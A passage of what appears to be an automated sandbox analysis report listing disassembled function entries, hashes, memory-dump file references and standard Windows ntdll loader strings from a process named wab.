                                                                              • Instruction ID: e6535f98eeefc021a981208ae1b03d51cb083a5150a64b8f062e009aa39fffa4
                                                                              • Opcode Fuzzy Hash: 389732bdf19ab837b8104699698b2bd3eee4d972b545810362b4f7fb79d0d903
                                                                              • Instruction Fuzzy Hash: D541F07254D311ABC722DB24CD88B5B77E8AF54750F00092AFE58D7255EB74E940CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 22771B39
                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 22771B4A
                                                                              • LdrpAllocateTls, xrefs: 22771B40
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                              • API String ID: 0-4274184382
                                                                              • Opcode ID: b11e806d8ac20f516e18c56740da6dbe126c27bf05e3fff95c47580fe3bf5963
                                                                              • Instruction ID: 1a5019da29b5db9cda576096b571bff5e8eb5081ada43631c7ac082179efa807
                                                                              • Opcode Fuzzy Hash: b11e806d8ac20f516e18c56740da6dbe126c27bf05e3fff95c47580fe3bf5963
                                                                              • Instruction Fuzzy Hash: 3841BC71E09709AFDB16CFA8C884AAEBBF1FF58314F058518E505AB214E734A800CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 227BC1C5
                                                                              • PreferredUILanguages, xrefs: 227BC212
                                                                              • @, xrefs: 227BC1F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                              • API String ID: 0-2968386058
                                                                              • Opcode ID: a3db788f1cb82e4dc9426f2ae339cd0d8bd857441f90faf5a3c7df37b343da69
                                                                              • Instruction ID: f2377fbd740688ee7311a248c70bf11ec46b70a752f29771e1831b1a3a65ea9a
                                                                              • Opcode Fuzzy Hash: a3db788f1cb82e4dc9426f2ae339cd0d8bd857441f90faf5a3c7df37b343da69
                                                                              • Instruction Fuzzy Hash: 4D411F72E04319AFDB01CAD4C995FDFB7B8AF18B04F10816AE615F7250D7749A45CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                              • API String ID: 0-1373925480
                                                                              • Opcode ID: dafb6407bc4cfe8faf3faa2f4ed814bea48727c615ffcd54d6a3c2db4851bb91
                                                                              • Instruction ID: 2b963e16d32e1f3567a20160e684716fe57ff98210174edc923a77660b4c2196
                                                                              • Opcode Fuzzy Hash: dafb6407bc4cfe8faf3faa2f4ed814bea48727c615ffcd54d6a3c2db4851bb91
                                                                              • Instruction Fuzzy Hash: 8E4111329087588BEB12CBE5EA64B9EB7B9FF55344F10056AD900FF791DB348901CB11
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              • LdrpCheckRedirection, xrefs: 2278488F
                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 22784899
                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 22784888
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                              • API String ID: 0-3154609507
                                                                              • Opcode ID: 240310de7d9927dfce06995a5f6175ac0268f49a74b79b058da5a446318af285
                                                                              • Instruction ID: d3431105388f79f625a694c5daf24be38bfe6c3b40e0f6597cf7b1ae1fb5c4ab
                                                                              • Opcode Fuzzy Hash: 240310de7d9927dfce06995a5f6175ac0268f49a74b79b058da5a446318af285
                                                                              • Instruction Fuzzy Hash: A041B232A0C3928FCB11CE58C951A167BE5EF49754F020679ED54A7215E7B0E900EB93
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 2270A2FB
                                                                              • PSm", xrefs: 2270A348
                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 2270A309
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: PSm"$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                              • API String ID: 0-4239001100
                                                                              • Opcode ID: eb7dc60067c1123ac635b3a3b3556268c4ae1380d07a2309e0a39791d94d9e1e
                                                                              • Instruction ID: 70998ca5e4ecf1f2bb93dcb368bfdb6d89039479a33519169f50276a1e43f438
                                                                              • Opcode Fuzzy Hash: eb7dc60067c1123ac635b3a3b3556268c4ae1380d07a2309e0a39791d94d9e1e
                                                                              • Instruction Fuzzy Hash: DA419F31A08749DBCB05CF69C540F69B7F4FF95704F2041A5EE04EB251E679DA44CB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              • RtlCreateActivationContext, xrefs: 227729F9
                                                                              • Actx , xrefs: 227333AC
                                                                              • SXS: %s() passed the empty activation context data, xrefs: 227729FE
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                              • API String ID: 0-859632880
                                                                              • Opcode ID: 65f4d2f41614db87b85355c4fe29f5a4f5b70c1e78a10bc68a6649aa09c332b6
                                                                              • Instruction ID: ed3a17a8581c057cdf21000f5f1b55ce00ad61afebc9baf988de3634adf0c87a
                                                                              • Opcode Fuzzy Hash: 65f4d2f41614db87b85355c4fe29f5a4f5b70c1e78a10bc68a6649aa09c332b6
                                                                              • Instruction Fuzzy Hash: 7A3101326093059FEB27CF68C884FAA37A4AF94724F014469EE14AF286CB70D941CBD0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              • LdrpInitializeTls, xrefs: 22771A47
                                                                              • DLL "%wZ" has TLS information at %p, xrefs: 22771A40
                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 22771A51
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                              • API String ID: 0-931879808
                                                                              • Opcode ID: 7da6dd11319d6696661acbc94a352026a3f7952a5be922162fb407890ebf42f6
                                                                              • Instruction ID: 1dd6f01fb0f8b063fa8a360ac1db6ec74a52dc365988e9674ee7f0378e0f718e
                                                                              • Opcode Fuzzy Hash: 7da6dd11319d6696661acbc94a352026a3f7952a5be922162fb407890ebf42f6
                                                                              • Instruction Fuzzy Hash: 30310A7264D301EBE7228B85CD85F6A7BB8FB50354F060519EA05BB1A5EB74AE40C7A0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              • LdrpInitializationFailure, xrefs: 227820FA
                                                                              • Process initialization failed with status 0x%08lx, xrefs: 227820F3
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 22782104
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-2986994758
                                                                              • Opcode ID: c6094e7331178b4820953b43bdbc0d23d39585e776edb093f27b9408a0d7c745
                                                                              • Instruction ID: 01b8ae2c64d26b3a7799a9bbd41446129095e6b045053265d14505ad130cc400
                                                                              • Opcode Fuzzy Hash: c6094e7331178b4820953b43bdbc0d23d39585e776edb093f27b9408a0d7c745
                                                                              • Instruction Fuzzy Hash: 6DF04632B48348BFE714DB08CD86FAA37B8EB50798F200464FB047B285D6F4A900D692
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: #%u
                                                                              • API String ID: 48624451-232158463
                                                                              • Opcode ID: d8d64fa24d28dd4ce0d8d8a0e6a61f8b60f7b957d438ba3db6997923fd136cf9
                                                                              • Instruction ID: 5a79a5acb68aace2b81dd29d3eb0ca858a725d3018b8e5cc587e9d4a91c82c6b
                                                                              • Opcode Fuzzy Hash: d8d64fa24d28dd4ce0d8d8a0e6a61f8b60f7b957d438ba3db6997923fd136cf9
                                                                              • Instruction Fuzzy Hash: 71713971A043499FDB02CFA9C995FAEB7F9AF18704F144165E904EB251EB34EE01CB61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@
                                                                              • API String ID: 0-149943524
                                                                              • Opcode ID: 2e7c06fa1a6a5f7a7b96a9324d2c4c4424b446ea18484b995c90b96a88a58569
                                                                              • Instruction ID: 45c1403e5f08297636dfe997b7b749181baaaa231b042c4e890dcdb0dd3e1bf2
                                                                              • Opcode Fuzzy Hash: 2e7c06fa1a6a5f7a7b96a9324d2c4c4424b446ea18484b995c90b96a88a58569
                                                                              • Instruction Fuzzy Hash: 44327C7450C3518BC728CF15C690B7EB7E1EF88B48F504A2EFA959B290E778D944CB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: `$`
                                                                              • API String ID: 0-197956300
                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                              • Instruction ID: 92c5333144c90de4eb16fbfcb8529db73669bbcaa91914007fa1de5623ad090b
                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                              • Instruction Fuzzy Hash: D7C1CD312083429BDB15CF38C945B6BBBE5BF94359F048A2CFA95DB290D778D605CB82
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: Legacy$UEFI
                                                                              • API String ID: 2994545307-634100481
                                                                              • Opcode ID: c6cdd9cc5c58b519d7be79403099d428c074d4d6924a48d5f2710e5486c4ae5b
                                                                              • Instruction ID: 095fc526680e85289b8b56bbd2b9ea26e58dc86a6b73757429f36828c89ef365
                                                                              • Opcode Fuzzy Hash: c6cdd9cc5c58b519d7be79403099d428c074d4d6924a48d5f2710e5486c4ae5b
                                                                              • Instruction Fuzzy Hash: 5F615C72E083099FDB15CFA8C981BAEBBB5FB48704F50416DE659EF251DB31A940CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$$
                                                                              • API String ID: 0-233714265
                                                                              • Opcode ID: 3e187f0ceff98edbdf32787ff916d7cf367f044256860ce3527c3c94d65ee2fa
                                                                              • Instruction ID: f2555038018a92ae27fc65a4a3dc65e88c337adc8d6e6ca9389f15bfe6af55b0
                                                                              • Opcode Fuzzy Hash: 3e187f0ceff98edbdf32787ff916d7cf367f044256860ce3527c3c94d65ee2fa
                                                                              • Instruction Fuzzy Hash: 5261DF71A0D74ADFDB22DFA4C685BADB7F1FF44708F104429D514AB281DB34AA45CB82
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .Local\$@
                                                                              • API String ID: 0-380025441
                                                                              • Opcode ID: f5ae804992db61ccfbedd8df02f40af7cf01d81afb448ce610d49625bfdb407c
                                                                              • Instruction ID: 4b2f143d46f1b95627d62e5e65b1ac1a7342dc832f3d577634c8ceb53f1d8434
                                                                              • Opcode Fuzzy Hash: f5ae804992db61ccfbedd8df02f40af7cf01d81afb448ce610d49625bfdb407c
                                                                              • Instruction Fuzzy Hash: D4318FB250D3049FD322CF28C584A5BBBE8EFD4654F404A2EF9949B251DA35DE04CBD2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b35786a6ccbd8e082107da73406e92b698389eab0d6c05dd4d5cadf0e75fe9fc
                                                                              • Instruction ID: 7aea22855ed95c017898d6f4b90d77ae8c3cb5fb36e7d64ce2cfca0ac70f313d
                                                                              • Opcode Fuzzy Hash: b35786a6ccbd8e082107da73406e92b698389eab0d6c05dd4d5cadf0e75fe9fc
                                                                              • Instruction Fuzzy Hash: D8A15A71A0C742CFC311CF28C584A5ABBE6BF98314F144A6EF5859B351E730EA49CB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3025330537911aa574a4af0578b93049941f2f8b19ad1fd33b571280940317fe
                                                                              • Instruction ID: e808da4a928cdfe41171faa2101b74ee9046d75d3f4742b2eac0e0a7d798d1c1
                                                                              • Opcode Fuzzy Hash: 3025330537911aa574a4af0578b93049941f2f8b19ad1fd33b571280940317fe
                                                                              • Instruction Fuzzy Hash: 70415AB4D09388DFDB11CFA9C980AAEBBF4FB48340F10456EE959A7212DB349904CF60
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: GlobalTags
                                                                              • API String ID: 0-1106856819
                                                                              • Opcode ID: 4530cbb8bd6ccfc023ac6e88da93205c804f7f6ec403d9f84f3b70f7cd91b0b9
                                                                              • Instruction ID: 3f33d165921c4759c3c242b6f815ff88fb1256e08a12f382a708ca236c069843
                                                                              • Opcode Fuzzy Hash: 4530cbb8bd6ccfc023ac6e88da93205c804f7f6ec403d9f84f3b70f7cd91b0b9
                                                                              • Instruction Fuzzy Hash: BC717D75E0830ACFDF19CF99C691A9DBBB1BF48754F10812EE905AB249E7359901CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @
                                                                              • API String ID: 0-2766056989
                                                                              • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                              • Instruction ID: 43c5c10d78d614007f9f80e4578e85bc48426c4bd22900f749a25992bf69edc4
                                                                              • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                              • Instruction Fuzzy Hash: 9F617971D09319EBDB21CFA5C945BAEBBF4FFA0B14F104269E910B7290D7709A04CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: EXT-
                                                                              • API String ID: 0-1948896318
                                                                              • Opcode ID: a1ffa249b2184a9cd824e2d92f5d52f35bcb527803c0b30193b6ae5e3d27a5c3
                                                                              • Instruction ID: 334e402bf619bc3068040d76effac5f08a7f7a2e5b0b387a386c6db2be392118
                                                                              • Opcode Fuzzy Hash: a1ffa249b2184a9cd824e2d92f5d52f35bcb527803c0b30193b6ae5e3d27a5c3
                                                                              • Instruction Fuzzy Hash: 5F41807250D3529BE711DB75C984F6BB7E8AF88718F400A2DFA84E7180EAB4D904C797
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ?+M(
                                                                              • API String ID: 0-3956342877
                                                                              • Opcode ID: 3f57bdbd77255653c88c43dc59fe0e5dddb844e07cf12529c44f1239249509c6
                                                                              • Instruction ID: f4403ae67611627792d6877a5d1b4193e0478e3b795dee14e180aa5d371e1e84
                                                                              • Opcode Fuzzy Hash: 3f57bdbd77255653c88c43dc59fe0e5dddb844e07cf12529c44f1239249509c6
                                                                              • Instruction Fuzzy Hash: B341DFB2648302EFDB16DF68C984B1ABBE8FF18794F004469EA11DB261E774D950CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: PreferredUILanguages
                                                                              • API String ID: 0-1884656846
                                                                              • Opcode ID: cbc0e6e425cb46c1bfb14ed66b6eefed51a3cb1db9d02ff8cbcfd534d4717694
                                                                              • Instruction ID: b436448ad591ff7eb69fb8f522e43ec40637bc606d7d8000b8df020f58b0ad7c
                                                                              • Opcode Fuzzy Hash: cbc0e6e425cb46c1bfb14ed66b6eefed51a3cb1db9d02ff8cbcfd534d4717694
                                                                              • Instruction Fuzzy Hash: 7F419E32D08319ABDB12DEA4C980BEEB7B9EF44754F011266EE52BB250D630DE40C7A0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
